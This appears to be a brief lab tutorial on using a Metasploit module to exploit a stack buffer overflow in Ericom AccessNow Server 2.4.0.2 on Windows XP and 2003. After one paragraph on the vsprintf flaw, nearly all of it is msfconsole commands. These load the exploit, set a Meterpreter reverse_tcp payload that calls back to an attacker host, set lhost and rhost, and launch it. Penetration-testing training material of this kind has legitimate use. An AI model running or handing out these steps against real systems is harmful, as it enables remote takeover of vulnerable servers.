This module exploits a stack based buffer overflow in Ericom AccessNow Server. The vulnerability is due to an insecure usage of vsprintf with user controlled data, which can be triggered with a malformed HTTP request. This module has been tested successfully with Ericom AccessNow Server 2.4.0.2 on Windows XP SP3 and Windows 2003 Server SP2.

Exploit Targets

Ericom AccessNow Server 2.4.0.2

Requirement

Attacker: kali Linux

Victim PC: Windows XP SP 3

Open Kali terminal type msfconsole

Now type use exploit/windows/http/ericom_access_now_bof

msf exploit (ericom_access_now_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (ericom_access_now_bof)>set lhost 192.168.1.8 (IP of Local Host)

msf exploit (ericom_access_now_bof)>set rhost 192.168.1.2 (IP of Remote PC)

msf exploit (ericom_access_now_bof)>exploit